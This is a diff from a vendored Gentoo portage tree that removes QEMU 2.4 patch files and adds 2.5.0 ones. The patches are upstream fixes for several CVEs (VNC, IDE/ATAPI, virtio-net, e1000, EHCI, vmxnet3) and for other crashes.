cs->exception_index = EXCP_EXT_INTERRUPT;
env->error_code = 0;

29
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.4-mips-wake-up-on-irq.patch vendored
View File

@ -1,29 +0,0 @@
Pending upstream inclusion
Link: https://lists.gnu.org/archive/html/qemu-devel/2015-09/msg03572.html
Patchwork: https://patchwork.ozlabs.org/patch/517391/
X-Gentoo-Bug: 563162
X-Gentoo-Bug-URL: https://bugs.gentoo.org/show_bug.cgi?id=563162
Signed-off-by: Markos Chandras <hwoarang@gentoo.org>
diff --git a/target-mips/cpu.c b/target-mips/cpu.c
index 144eea9..cbeca04 100644
--- a/target-mips/cpu.c
+++ b/target-mips/cpu.c
@@ -53,12 +53,13 @@ static bool mips_cpu_has_work(CPUState *cs)
CPUMIPSState *env = &cpu->env;
bool has_work = false;
- /* It is implementation dependent if non-enabled interrupts
- wake-up the CPU, however most of the implementations only
+ /* Prior to MIPS Release 6 it is implementation dependent if non-enabled
+ interrupts wake-up the CPU, however most of the implementations only
check for interrupts that can be taken. */
if ((cs->interrupt_request & CPU_INTERRUPT_HARD) &&
cpu_mips_hw_interrupts_pending(env)) {
- if (cpu_mips_hw_interrupts_enabled(env)) {
+ if (cpu_mips_hw_interrupts_enabled(env) ||
+ (env->insn_flags & ISA_MIPS32R6)) {
has_work = true;
}
}

86
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.4.0-CVE-2015-5225.patch vendored
View File

@ -1,86 +0,0 @@
https://bugs.gentoo.org/558416
fix from upstream git
From eb8934b0418b3b1d125edddc4fc334a54334a49b Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <kraxel@redhat.com>
Date: Mon, 17 Aug 2015 19:56:53 +0200
Subject: [PATCH] vnc: fix memory corruption (CVE-2015-5225)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
The _cmp_bytes variable added by commit "bea60dd ui/vnc: fix potential
memory corruption issues" can become negative. Result is (possibly
exploitable) memory corruption. Reason for that is it uses the stride
instead of bytes per scanline to apply limits.
For the server surface is is actually fine. vnc creates that itself,
there is never any padding and thus scanline length always equals stride.
For the guest surface scanline length and stride are typically identical
too, but it doesn't has to be that way. So add and use a new variable
(guest_ll) for the guest scanline length. Also rename min_stride to
line_bytes to make more clear what it actually is. Finally sprinkle
in an assert() to make sure we never use a negative _cmp_bytes again.
Reported-by: 范祚至(库特) <zuozhi.fzz@alibaba-inc.com>
Reviewed-by: P J P <ppandit@redhat.com>
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
ui/vnc.c | 15 ++++++++++-----
1 file changed, 10 insertions(+), 5 deletions(-)
diff --git a/ui/vnc.c b/ui/vnc.c
index e26973a..caf82f5 100644
--- a/ui/vnc.c
+++ b/ui/vnc.c
@@ -2872,7 +2872,7 @@ static int vnc_refresh_server_surface(VncDisplay *vd)
pixman_image_get_width(vd->server));
int height = MIN(pixman_image_get_height(vd->guest.fb),
pixman_image_get_height(vd->server));
- int cmp_bytes, server_stride, min_stride, guest_stride, y = 0;
+ int cmp_bytes, server_stride, line_bytes, guest_ll, guest_stride, y = 0;
uint8_t *guest_row0 = NULL, *server_row0;
VncState *vs;
int has_dirty = 0;
@@ -2891,17 +2891,21 @@ static int vnc_refresh_server_surface(VncDisplay *vd)
* Update server dirty map.
*/
server_row0 = (uint8_t *)pixman_image_get_data(vd->server);
- server_stride = guest_stride = pixman_image_get_stride(vd->server);
+ server_stride = guest_stride = guest_ll =
+ pixman_image_get_stride(vd->server);
cmp_bytes = MIN(VNC_DIRTY_PIXELS_PER_BIT * VNC_SERVER_FB_BYTES,
server_stride);
if (vd->guest.format != VNC_SERVER_FB_FORMAT) {
int width = pixman_image_get_width(vd->server);
tmpbuf = qemu_pixman_linebuf_create(VNC_SERVER_FB_FORMAT, width);
} else {
+ int guest_bpp =
+ PIXMAN_FORMAT_BPP(pixman_image_get_format(vd->guest.fb));
guest_row0 = (uint8_t *)pixman_image_get_data(vd->guest.fb);
guest_stride = pixman_image_get_stride(vd->guest.fb);
+ guest_ll = pixman_image_get_width(vd->guest.fb) * ((guest_bpp + 7) / 8);
}
- min_stride = MIN(server_stride, guest_stride);
+ line_bytes = MIN(server_stride, guest_ll);
for (;;) {
int x;
@@ -2932,9 +2936,10 @@ static int vnc_refresh_server_surface(VncDisplay *vd)
if (!test_and_clear_bit(x, vd->guest.dirty[y])) {
continue;
}
- if ((x + 1) * cmp_bytes > min_stride) {
- _cmp_bytes = min_stride - x * cmp_bytes;
+ if ((x + 1) * cmp_bytes > line_bytes) {
+ _cmp_bytes = line_bytes - x * cmp_bytes;
}
+ assert(_cmp_bytes >= 0);
if (memcmp(server_ptr, guest_ptr, _cmp_bytes) == 0) {
continue;
}
--
2.5.0

146
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.4.0-CVE-2015-6855.patch vendored
View File

@ -1,146 +0,0 @@
https://bugs.gentoo.org/560422
From d9033e1d3aa666c5071580617a57bd853c5d794a Mon Sep 17 00:00:00 2001
From: John Snow <jsnow@redhat.com>
Date: Thu, 17 Sep 2015 14:17:05 -0400
Subject: [PATCH] ide: fix ATAPI command permissions
We're a little too lenient with what we'll let an ATAPI drive handle.
Clamp down on the IDE command execution table to remove CD_OK permissions
from commands that are not and have never been ATAPI commands.
For ATAPI command validity, please see:
- ATA4 Section 6.5 ("PACKET Command feature set")
- ATA8/ACS Section 4.3 ("The PACKET feature set")
- ACS3 Section 4.3 ("The PACKET feature set")
ACS3 has a historical command validity table in Table B.4
("Historical Command Assignments") that can be referenced to find when
a command was introduced, deprecated, obsoleted, etc.
The only reference for ATAPI command validity is by checking that
version's PACKET feature set section.
ATAPI was introduced by T13 into ATA4, all commands retired prior to ATA4
therefore are assumed to have never been ATAPI commands.
Mandatory commands, as listed in ATA8-ACS3, are:
- DEVICE RESET
- EXECUTE DEVICE DIAGNOSTIC
- IDENTIFY DEVICE
- IDENTIFY PACKET DEVICE
- NOP
- PACKET
- READ SECTOR(S)
- SET FEATURES
Optional commands as listed in ATA8-ACS3, are:
- FLUSH CACHE
- READ LOG DMA EXT
- READ LOG EXT
- WRITE LOG DMA EXT
- WRITE LOG EXT
All other commands are illegal to send to an ATAPI device and should
be rejected by the device.
CD_OK removal justifications:
0x06 WIN_DSM Defined in ACS2. Not valid for ATAPI.
0x21 WIN_READ_ONCE Retired in ATA5. Not ATAPI in ATA4.
0x94 WIN_STANDBYNOW2 Retired in ATA4. Did not coexist with ATAPI.
0x95 WIN_IDLEIMMEDIATE2 Retired in ATA4. Did not coexist with ATAPI.
0x96 WIN_STANDBY2 Retired in ATA4. Did not coexist with ATAPI.
0x97 WIN_SETIDLE2 Retired in ATA4. Did not coexist with ATAPI.
0x98 WIN_CHECKPOWERMODE2 Retired in ATA4. Did not coexist with ATAPI.
0x99 WIN_SLEEPNOW2 Retired in ATA4. Did not coexist with ATAPI.
0xE0 WIN_STANDBYNOW1 Not part of ATAPI in ATA4, ACS or ACS3.
0xE1 WIN_IDLEIMMDIATE Not part of ATAPI in ATA4, ACS or ACS3.
0xE2 WIN_STANDBY Not part of ATAPI in ATA4, ACS or ACS3.
0xE3 WIN_SETIDLE1 Not part of ATAPI in ATA4, ACS or ACS3.
0xE4 WIN_CHECKPOWERMODE1 Not part of ATAPI in ATA4, ACS or ACS3.
0xE5 WIN_SLEEPNOW1 Not part of ATAPI in ATA4, ACS or ACS3.
0xF8 WIN_READ_NATIVE_MAX Obsoleted in ACS3. Not ATAPI in ATA4 or ACS.
This patch fixes a divide by zero fault that can be caused by sending
the WIN_READ_NATIVE_MAX command to an ATAPI drive, which causes it to
attempt to use zeroed CHS values to perform sector arithmetic.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: John Snow <jsnow@redhat.com>
Reviewed-by: Markus Armbruster <armbru@redhat.com>
Message-id: 1441816082-21031-1-git-send-email-jsnow@redhat.com
CC: qemu-stable@nongnu.org
---
hw/ide/core.c | 30 +++++++++++++++---------------
1 file changed, 15 insertions(+), 15 deletions(-)
diff --git a/hw/ide/core.c b/hw/ide/core.c
index 8ba04df..1cc6945 100644
--- a/hw/ide/core.c
+++ b/hw/ide/core.c
@@ -1746,11 +1746,11 @@ static const struct {
} ide_cmd_table[0x100] = {
/* NOP not implemented, mandatory for CD */
[CFA_REQ_EXT_ERROR_CODE] = { cmd_cfa_req_ext_error_code, CFA_OK },
- [WIN_DSM] = { cmd_data_set_management, ALL_OK },
+ [WIN_DSM] = { cmd_data_set_management, HD_CFA_OK },
[WIN_DEVICE_RESET] = { cmd_device_reset, CD_OK },
[WIN_RECAL] = { cmd_nop, HD_CFA_OK | SET_DSC},
[WIN_READ] = { cmd_read_pio, ALL_OK },
- [WIN_READ_ONCE] = { cmd_read_pio, ALL_OK },
+ [WIN_READ_ONCE] = { cmd_read_pio, HD_CFA_OK },
[WIN_READ_EXT] = { cmd_read_pio, HD_CFA_OK },
[WIN_READDMA_EXT] = { cmd_read_dma, HD_CFA_OK },
[WIN_READ_NATIVE_MAX_EXT] = { cmd_read_native_max, HD_CFA_OK | SET_DSC },
@@ -1769,12 +1769,12 @@ static const struct {
[CFA_TRANSLATE_SECTOR] = { cmd_cfa_translate_sector, CFA_OK },
[WIN_DIAGNOSE] = { cmd_exec_dev_diagnostic, ALL_OK },
[WIN_SPECIFY] = { cmd_nop, HD_CFA_OK | SET_DSC },
- [WIN_STANDBYNOW2] = { cmd_nop, ALL_OK },
- [WIN_IDLEIMMEDIATE2] = { cmd_nop, ALL_OK },
- [WIN_STANDBY2] = { cmd_nop, ALL_OK },
- [WIN_SETIDLE2] = { cmd_nop, ALL_OK },
- [WIN_CHECKPOWERMODE2] = { cmd_check_power_mode, ALL_OK | SET_DSC },
- [WIN_SLEEPNOW2] = { cmd_nop, ALL_OK },
+ [WIN_STANDBYNOW2] = { cmd_nop, HD_CFA_OK },
+ [WIN_IDLEIMMEDIATE2] = { cmd_nop, HD_CFA_OK },
+ [WIN_STANDBY2] = { cmd_nop, HD_CFA_OK },
+ [WIN_SETIDLE2] = { cmd_nop, HD_CFA_OK },
+ [WIN_CHECKPOWERMODE2] = { cmd_check_power_mode, HD_CFA_OK | SET_DSC },
+ [WIN_SLEEPNOW2] = { cmd_nop, HD_CFA_OK },
[WIN_PACKETCMD] = { cmd_packet, CD_OK },
[WIN_PIDENTIFY] = { cmd_identify_packet, CD_OK },
[WIN_SMART] = { cmd_smart, HD_CFA_OK | SET_DSC },
@@ -1788,19 +1788,19 @@ static const struct {
[WIN_WRITEDMA] = { cmd_write_dma, HD_CFA_OK },
[WIN_WRITEDMA_ONCE] = { cmd_write_dma, HD_CFA_OK },
[CFA_WRITE_MULTI_WO_ERASE] = { cmd_write_multiple, CFA_OK },
- [WIN_STANDBYNOW1] = { cmd_nop, ALL_OK },
- [WIN_IDLEIMMEDIATE] = { cmd_nop, ALL_OK },
- [WIN_STANDBY] = { cmd_nop, ALL_OK },
- [WIN_SETIDLE1] = { cmd_nop, ALL_OK },
- [WIN_CHECKPOWERMODE1] = { cmd_check_power_mode, ALL_OK | SET_DSC },
- [WIN_SLEEPNOW1] = { cmd_nop, ALL_OK },
+ [WIN_STANDBYNOW1] = { cmd_nop, HD_CFA_OK },
+ [WIN_IDLEIMMEDIATE] = { cmd_nop, HD_CFA_OK },
+ [WIN_STANDBY] = { cmd_nop, HD_CFA_OK },
+ [WIN_SETIDLE1] = { cmd_nop, HD_CFA_OK },
+ [WIN_CHECKPOWERMODE1] = { cmd_check_power_mode, HD_CFA_OK | SET_DSC },
+ [WIN_SLEEPNOW1] = { cmd_nop, HD_CFA_OK },
[WIN_FLUSH_CACHE] = { cmd_flush_cache, ALL_OK },
[WIN_FLUSH_CACHE_EXT] = { cmd_flush_cache, HD_CFA_OK },
[WIN_IDENTIFY] = { cmd_identify, ALL_OK },
[WIN_SETFEATURES] = { cmd_set_features, ALL_OK | SET_DSC },
[IBM_SENSE_CONDITION] = { cmd_ibm_sense_condition, CFA_OK | SET_DSC },
[CFA_WEAR_LEVEL] = { cmd_cfa_erase_sectors, HD_CFA_OK | SET_DSC },
- [WIN_READ_NATIVE_MAX] = { cmd_read_native_max, ALL_OK | SET_DSC },
+ [WIN_READ_NATIVE_MAX] = { cmd_read_native_max, HD_CFA_OK | SET_DSC },
};
static bool ide_cmd_permitted(IDEState *s, uint32_t cmd)
--
2.6.0.rc2.230.g3dd15c0

58
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.4.0-CVE-2015-7295-1.patch vendored
View File

@ -1,58 +0,0 @@
https://bugs.gentoo.org/560760
From ce317461573bac12b10d67699b4ddf1f97cf066c Mon Sep 17 00:00:00 2001
From: Jason Wang <jasowang@redhat.com>
Date: Fri, 25 Sep 2015 13:21:28 +0800
Subject: [PATCH 1/3] virtio: introduce virtqueue_unmap_sg()
Factor out sg unmapping logic. This will be reused by the patch that
can discard descriptor.
Cc: Michael S. Tsirkin <mst@redhat.com>
Cc: Andrew James <andrew.james@hpe.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
---
hw/virtio/virtio.c | 14 ++++++++++----
1 file changed, 10 insertions(+), 4 deletions(-)
diff --git a/hw/virtio/virtio.c b/hw/virtio/virtio.c
index 7504f8b..6f2b96c 100644
--- a/hw/virtio/virtio.c
+++ b/hw/virtio/virtio.c
@@ -244,14 +244,12 @@ int virtio_queue_empty(VirtQueue *vq)
return vring_avail_idx(vq) == vq->last_avail_idx;
}
-void virtqueue_fill(VirtQueue *vq, const VirtQueueElement *elem,
- unsigned int len, unsigned int idx)
+static void virtqueue_unmap_sg(VirtQueue *vq, const VirtQueueElement *elem,
+ unsigned int len)
{
unsigned int offset;
int i;
- trace_virtqueue_fill(vq, elem, len, idx);
-
offset = 0;
for (i = 0; i < elem->in_num; i++) {
size_t size = MIN(len - offset, elem->in_sg[i].iov_len);
@@ -267,6 +265,14 @@ void virtqueue_fill(VirtQueue *vq, const VirtQueueElement *elem,
cpu_physical_memory_unmap(elem->out_sg[i].iov_base,
elem->out_sg[i].iov_len,
0, elem->out_sg[i].iov_len);
+}
+
+void virtqueue_fill(VirtQueue *vq, const VirtQueueElement *elem,
+ unsigned int len, unsigned int idx)
+{
+ trace_virtqueue_fill(vq, elem, len, idx);
+
+ virtqueue_unmap_sg(vq, elem, len);
idx = (idx + vring_used_idx(vq)) % vq->vring.num;
--
2.6.0.rc2.230.g3dd15c0

54
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.4.0-CVE-2015-7295-2.patch vendored
View File

@ -1,54 +0,0 @@
https://bugs.gentoo.org/560760
From 29b9f5efd78ae0f9cc02dd169b6e80d2c404bade Mon Sep 17 00:00:00 2001
From: Jason Wang <jasowang@redhat.com>
Date: Fri, 25 Sep 2015 13:21:29 +0800
Subject: [PATCH 2/3] virtio: introduce virtqueue_discard()
This patch introduces virtqueue_discard() to discard a descriptor and
unmap the sgs. This will be used by the patch that will discard
descriptor when packet is truncated.
Cc: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
---
hw/virtio/virtio.c | 7 +++++++
include/hw/virtio/virtio.h | 2 ++
2 files changed, 9 insertions(+)
diff --git a/hw/virtio/virtio.c b/hw/virtio/virtio.c
index 6f2b96c..d0bc72e 100644
--- a/hw/virtio/virtio.c
+++ b/hw/virtio/virtio.c
@@ -267,6 +267,13 @@ static void virtqueue_unmap_sg(VirtQueue *vq, const VirtQueueElement *elem,
0, elem->out_sg[i].iov_len);
}
+void virtqueue_discard(VirtQueue *vq, const VirtQueueElement *elem,
+ unsigned int len)
+{
+ vq->last_avail_idx--;
+ virtqueue_unmap_sg(vq, elem, len);
+}
+
void virtqueue_fill(VirtQueue *vq, const VirtQueueElement *elem,
unsigned int len, unsigned int idx)
{
diff --git a/include/hw/virtio/virtio.h b/include/hw/virtio/virtio.h
index 6201ee8..9d09115 100644
--- a/include/hw/virtio/virtio.h
+++ b/include/hw/virtio/virtio.h
@@ -146,6 +146,8 @@ void virtio_del_queue(VirtIODevice *vdev, int n);
void virtqueue_push(VirtQueue *vq, const VirtQueueElement *elem,
unsigned int len);
void virtqueue_flush(VirtQueue *vq, unsigned int count);
+void virtqueue_discard(VirtQueue *vq, const VirtQueueElement *elem,
+ unsigned int len);
void virtqueue_fill(VirtQueue *vq, const VirtQueueElement *elem,
unsigned int len, unsigned int idx);
--
2.6.0.rc2.230.g3dd15c0

47
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.4.0-CVE-2015-7295-3.patch vendored
View File

@ -1,47 +0,0 @@
https://bugs.gentoo.org/560760
From 0cf33fb6b49a19de32859e2cdc6021334f448fb3 Mon Sep 17 00:00:00 2001
From: Jason Wang <jasowang@redhat.com>
Date: Fri, 25 Sep 2015 13:21:30 +0800
Subject: [PATCH 3/3] virtio-net: correctly drop truncated packets
When packet is truncated during receiving, we drop the packets but
neither discard the descriptor nor add and signal used
descriptor. This will lead several issues:
- sg mappings are leaked
- rx will be stalled if a lots of packets were truncated
In order to be consistent with vhost, fix by discarding the descriptor
in this case.
Cc: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
---
hw/net/virtio-net.c | 8 +-------
1 file changed, 1 insertion(+), 7 deletions(-)
diff --git a/hw/net/virtio-net.c b/hw/net/virtio-net.c
index d388c55..a877614 100644
--- a/hw/net/virtio-net.c
+++ b/hw/net/virtio-net.c
@@ -1094,13 +1094,7 @@ static ssize_t virtio_net_receive(NetClientState *nc, const uint8_t *buf, size_t
* must have consumed the complete packet.
* Otherwise, drop it. */
if (!n->mergeable_rx_bufs && offset < size) {
-#if 0
- error_report("virtio-net truncated non-mergeable packet: "
- "i %zd mergeable %d offset %zd, size %zd, "
- "guest hdr len %zd, host hdr len %zd",
- i, n->mergeable_rx_bufs,
- offset, size, n->guest_hdr_len, n->host_hdr_len);
-#endif
+ virtqueue_discard(q->rx_vq, &elem, total);
return size;
}
--
2.6.0.rc2.230.g3dd15c0

124
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.4.0-block-mirror-crash.patch vendored
View File

@ -1,124 +0,0 @@
https://bugs.gentoo.org/558396
fix from upstream git
From e424aff5f307227b1c2512bbb8ece891bb895cef Mon Sep 17 00:00:00 2001
From: Kevin Wolf <kwolf@redhat.com>
Date: Thu, 13 Aug 2015 10:41:50 +0200
Subject: [PATCH] mirror: Fix coroutine reentrance
This fixes a regression introduced by commit dcfb3beb ("mirror: Do zero
write on target if sectors not allocated"), which was reported to cause
aborts with the message "Co-routine re-entered recursively".
The cause for this bug is the following code in mirror_iteration_done():
if (s->common.busy) {
qemu_coroutine_enter(s->common.co, NULL);
}
This has always been ugly because - unlike most places that reenter - it
doesn't have a specific yield that it pairs with, but is more
uncontrolled. What we really mean here is "reenter the coroutine if
it's in one of the four explicit yields in mirror.c".
This used to be equivalent with s->common.busy because neither
mirror_run() nor mirror_iteration() call any function that could yield.
However since commit dcfb3beb this doesn't hold true any more:
bdrv_get_block_status_above() can yield.
So what happens is that bdrv_get_block_status_above() wants to take a
lock that is already held, so it adds itself to the queue of waiting
coroutines and yields. Instead of being woken up by the unlock function,
however, it gets woken up by mirror_iteration_done(), which is obviously
wrong.
In most cases the code actually happens to cope fairly well with such
cases, but in this specific case, the unlock must already have scheduled
the coroutine for wakeup when mirror_iteration_done() reentered it. And
then the coroutine happened to process the scheduled restarts and tried
to reenter itself recursively.
This patch fixes the problem by pairing the reenter in
mirror_iteration_done() with specific yields instead of abusing
s->common.busy.
Cc: qemu-stable@nongnu.org
Signed-off-by: Kevin Wolf <kwolf@redhat.com>
Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
Reviewed-by: Jeff Cody <jcody@redhat.com>
Message-id: 1439455310-11263-1-git-send-email-kwolf@redhat.com
Signed-off-by: Jeff Cody <jcody@redhat.com>
---
block/mirror.c | 15 ++++++++++-----
1 file changed, 10 insertions(+), 5 deletions(-)
diff --git a/block/mirror.c b/block/mirror.c
index 0841964..9474443 100644
--- a/block/mirror.c
+++ b/block/mirror.c
@@ -60,6 +60,7 @@ typedef struct MirrorBlockJob {
int sectors_in_flight;
int ret;
bool unmap;
+ bool waiting_for_io;
} MirrorBlockJob;
typedef struct MirrorOp {
@@ -114,11 +115,7 @@ static void mirror_iteration_done(MirrorOp *op, int ret)
qemu_iovec_destroy(&op->qiov);
g_slice_free(MirrorOp, op);
- /* Enter coroutine when it is not sleeping. The coroutine sleeps to
- * rate-limit itself. The coroutine will eventually resume since there is
- * a sleep timeout so don't wake it early.
- */
- if (s->common.busy) {
+ if (s->waiting_for_io) {
qemu_coroutine_enter(s->common.co, NULL);
}
}
@@ -203,7 +200,9 @@ static uint64_t coroutine_fn mirror_iteration(MirrorBlockJob *s)
/* Wait for I/O to this cluster (from a previous iteration) to be done. */
while (test_bit(next_chunk, s->in_flight_bitmap)) {
trace_mirror_yield_in_flight(s, sector_num, s->in_flight);
+ s->waiting_for_io = true;
qemu_coroutine_yield();
+ s->waiting_for_io = false;
}
do {
@@ -239,7 +238,9 @@ static uint64_t coroutine_fn mirror_iteration(MirrorBlockJob *s)
*/
while (nb_chunks == 0 && s->buf_free_count < added_chunks) {
trace_mirror_yield_buf_busy(s, nb_chunks, s->in_flight);
+ s->waiting_for_io = true;
qemu_coroutine_yield();
+ s->waiting_for_io = false;
}
if (s->buf_free_count < nb_chunks + added_chunks) {
trace_mirror_break_buf_busy(s, nb_chunks, s->in_flight);
@@ -337,7 +338,9 @@ static void mirror_free_init(MirrorBlockJob *s)
static void mirror_drain(MirrorBlockJob *s)
{
while (s->in_flight > 0) {
+ s->waiting_for_io = true;
qemu_coroutine_yield();
+ s->waiting_for_io = false;
}
}
@@ -510,7 +513,9 @@ static void coroutine_fn mirror_run(void *opaque)
if (s->in_flight == MAX_IN_FLIGHT || s->buf_free_count == 0 ||
(cnt == 0 && s->in_flight > 0)) {
trace_mirror_yield(s, s->in_flight, s->buf_free_count, cnt);
+ s->waiting_for_io = true;
qemu_coroutine_yield();
+ s->waiting_for_io = false;
continue;
} else if (cnt != 0) {
delay_ns = mirror_iteration(s);
--
2.5.0

39
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.4.0-e1000-loop.patch vendored
View File

@ -1,39 +0,0 @@
https://bugs.gentoo.org/559656
https://lists.gnu.org/archive/html/qemu-devel/2015-09/msg01199.html
From: Stefan Hajnoczi <stefanha@redhat.com>
Subject: [PATCH] e1000: Avoid infinite loop in processing transmit descriptor
Newsgroups: gmane.comp.emulators.qemu
Date: 2015-09-04 16:21:06 GMT (2 days, 12 hours and 51 minutes ago)
From: P J P <pjp@fedoraproject.org>
While processing transmit descriptors, it could lead to an infinite
loop if 'bytes' was to become zero; Add a check to avoid it.
[The guest can force 'bytes' to 0 by setting the hdr_len and mss
descriptor fields to 0.
--Stefan]
Signed-off-by: P J P <pjp@fedoraproject.org>
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/e1000.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/hw/net/e1000.c b/hw/net/e1000.c
index 5c6bcd0..09c9e9d 100644
--- a/hw/net/e1000.c
+++ b/hw/net/e1000.c
@@ -740,7 +740,8 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
memmove(tp->data, tp->header, tp->hdr_len);
tp->size = tp->hdr_len;
}
- } while (split_size -= bytes);
+ split_size -= bytes;
+ } while (bytes && split_size);
} else if (!tp->tse && tp->cptse) {
// context descriptor TSE is not set, while data descriptor TSE is set
DBGOUT(TXERR, "TCP segmentation error\n");
--
2.4.3

34
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-9pfs-segfault.patch vendored Normal file
View File

@ -0,0 +1,34 @@
From 4b3a4f2d458ca5a7c6c16ac36a8d9ac22cc253d6 Mon Sep 17 00:00:00 2001
From: Greg Kurz <gkurz@linux.vnet.ibm.com>
Date: Wed, 23 Dec 2015 10:56:58 +0100
Subject: [PATCH] virtio-9p: use accessor to get thread_pool
The aio_context_new() function does not allocate a thread pool. This is
deferred to the first call to the aio_get_thread_pool() accessor. It is
hence forbidden to access the thread_pool field directly, as it may be
NULL. The accessor *must* be used always.
Fixes: ebac1202c95a4f1b76b6ef3f0f63926fa76e753e
Reviewed-by: Michael Tokarev <mjt@tls.msk.ru>
Tested-by: Michael Tokarev <mjt@tls.msk.ru>
Cc: qemu-stable@nongnu.org
Signed-off-by: Greg Kurz <gkurz@linux.vnet.ibm.com>
---
hw/9pfs/virtio-9p-coth.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/9pfs/virtio-9p-coth.c b/hw/9pfs/virtio-9p-coth.c
index fb6e8f8..ab9425c 100644
--- a/hw/9pfs/virtio-9p-coth.c
+++ b/hw/9pfs/virtio-9p-coth.c
@@ -36,6 +36,6 @@ static int coroutine_enter_func(void *arg)
void co_run_in_worker_bh(void *opaque)
{
Coroutine *co = opaque;
- thread_pool_submit_aio(qemu_get_aio_context()->thread_pool,
+ thread_pool_submit_aio(aio_get_thread_pool(qemu_get_aio_context()),
coroutine_enter_func, co, coroutine_enter_cb, co);
}
--
2.7.4

50
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2015-8558.patch vendored Normal file
View File

@ -0,0 +1,50 @@
https://bugs.gentoo.org/568246
From 156a2e4dbffa85997636a7a39ef12da6f1b40254 Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <kraxel@redhat.com>
Date: Mon, 14 Dec 2015 09:21:23 +0100
Subject: [PATCH] ehci: make idt processing more robust
Make ehci_process_itd return an error in case we didn't do any actual
iso transfer because we've found no active transaction. That'll avoid
ehci happily run in circles forever if the guest builds a loop out of
idts.
This is CVE-2015-8558.
Cc: qemu-stable@nongnu.org
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Tested-by: P J P <ppandit@redhat.com>
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/hcd-ehci.c | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index 4e2161b..d07f228 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -1389,7 +1389,7 @@ static int ehci_process_itd(EHCIState *ehci,
{
USBDevice *dev;
USBEndpoint *ep;
- uint32_t i, len, pid, dir, devaddr, endp;
+ uint32_t i, len, pid, dir, devaddr, endp, xfers = 0;
uint32_t pg, off, ptr1, ptr2, max, mult;
ehci->periodic_sched_active = PERIODIC_ACTIVE;
@@ -1479,9 +1479,10 @@ static int ehci_process_itd(EHCIState *ehci,
ehci_raise_irq(ehci, USBSTS_INT);
}
itd->transact[i] &= ~ITD_XACT_ACTIVE;
+ xfers++;
}
}
- return 0;
+ return xfers ? 0 : -1;
}
--
2.6.2

95
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2015-8567.patch vendored Normal file
View File

@ -0,0 +1,95 @@
https://bugs.gentoo.org/567868
From aa4a3dce1c88ed51b616806b8214b7c8428b7470 Mon Sep 17 00:00:00 2001
From: P J P <ppandit@redhat.com>
Date: Tue, 15 Dec 2015 12:27:54 +0530
Subject: [PATCH] net: vmxnet3: avoid memory leakage in activate_device
Vmxnet3 device emulator does not check if the device is active
before activating it, also it did not free the transmit & receive
buffers while deactivating the device, thus resulting in memory
leakage on the host. This patch fixes both these issues to avoid
host memory leakage.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Reviewed-by: Dmitry Fleytman <dmitry@daynix.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Cc: qemu-stable@nongnu.org
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/vmxnet3.c | 24 ++++++++++++++++--------
1 file changed, 16 insertions(+), 8 deletions(-)
diff --git a/hw/net/vmxnet3.c b/hw/net/vmxnet3.c
index a5dd79a..9c1adfc 100644
--- a/hw/net/vmxnet3.c
+++ b/hw/net/vmxnet3.c
@@ -1194,8 +1194,13 @@ static void vmxnet3_reset_mac(VMXNET3State *s)
static void vmxnet3_deactivate_device(VMXNET3State *s)
{
- VMW_CBPRN("Deactivating vmxnet3...");
- s->device_active = false;
+ if (s->device_active) {
+ VMW_CBPRN("Deactivating vmxnet3...");
+ vmxnet_tx_pkt_reset(s->tx_pkt);
+ vmxnet_tx_pkt_uninit(s->tx_pkt);
+ vmxnet_rx_pkt_uninit(s->rx_pkt);
+ s->device_active = false;
+ }
}
static void vmxnet3_reset(VMXNET3State *s)
@@ -1204,7 +1209,6 @@ static void vmxnet3_reset(VMXNET3State *s)
vmxnet3_deactivate_device(s);
vmxnet3_reset_interrupt_states(s);
- vmxnet_tx_pkt_reset(s->tx_pkt);
s->drv_shmem = 0;
s->tx_sop = true;
s->skip_current_tx_pkt = false;
@@ -1431,6 +1435,12 @@ static void vmxnet3_activate_device(VMXNET3State *s)
return;
}
+ /* Verify if device is active */
+ if (s->device_active) {
+ VMW_CFPRN("Vmxnet3 device is active");
+ return;
+ }
+
vmxnet3_adjust_by_guest_type(s);
vmxnet3_update_features(s);
